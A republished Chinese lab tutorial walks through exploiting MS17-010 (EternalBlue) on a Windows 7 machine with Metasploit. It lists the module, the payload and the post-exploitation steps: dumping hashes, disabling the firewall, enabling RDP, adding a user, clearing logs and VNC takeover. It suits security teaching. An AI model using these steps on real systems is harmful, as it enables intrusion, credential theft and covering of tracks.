ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

kail利用msf工具对ms17-010(永恒之蓝)漏洞入侵渗透Win7

2021-05-16 15:30:22  阅读:202  来源: 互联网

标签:查看 windows Win7 010 漏洞 exploit kail ms17


kail利用msf工具对ms17-010(永恒之蓝)漏洞入侵渗透Win7

前言:

提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生。
该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播 。勒索病毒肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。最新统计数据显示,100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。 勒索病毒是自熊猫烧香以来影响力最大的病毒之一。

实验环境:

工具:metasploit

靶机两台:windows 7sp1和kali2020

攻击机IP地址:192.168.29.131

被攻击机IP地址:192.168.29.128

实验条件:两台机子可以互通的,并且windows 7sp1(无补丁)开启了445端口,防火墙是关闭的。
 

步骤:

1、在kali里面打开metasploit漏洞利用框架

2、搜索ms17-010漏洞利用模块 search 17-010

找到exploit/windows/smb/ms17_010_eternalblue

其中exploit具有攻击性,auxliary是用来验证的。

3、使用利用模块use+exploit/windows/smb/ms17_010_eternalblue

4、查看配置项 show options

5、设置 靶机IP地址(RHOST),攻击机IP地址(LHOST)

再次查看配置项

6、实施攻击exploit/run

7、攻入目标主机

Meterpreter 是 Metasploit 的一个扩展模块,可以调用 Metasploit 的一些功能,
对目标系统进行更深入的渗透,如获取屏幕、上传/下载文件、创建持久后门等。

 

在攻击进去的情况下演示几个功能

1、查看目标主机的操作系统信息(sysinfo)

2、对目标主机的屏幕进行截图(截图保存在/root下)

3、查看目标主机所有的用户名和密码(密码显示为hash值)

4获取shell页面

乱码解决方法:

输入chcp 65001可将乱码解决

5、关闭防火墙

6、关闭Telnet服务

7、用两种方法开启远程桌面服务,并查看远程桌面功能启用情况

1)方法1:run  getgui  -e

(2)方法2:run post/windows/manage/enable_rdp

到windows7sp1上查看远程桌面功能启用情况

8、创建系统用户(创建用户名为:test,密码为:123456)

9、清除日志

 

使用VNC payload远程操控目标电脑

1,输入Background,返回退出meterpreter界面

2,查看set payload 参数(输入set payload 按两下 TAB键 )

找到windows/x64/vncinject/reverse_tcp,复制黏贴

3,set payload windows/x64/vncinject/reverse_tcp

4,set viewonly no

5,exploit

成功获取控制权

 

 

标签:查看,windows,Win7,010,漏洞,exploit,kail,ms17
来源: https://blog.csdn.net/qq_50854662/article/details/116891040

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有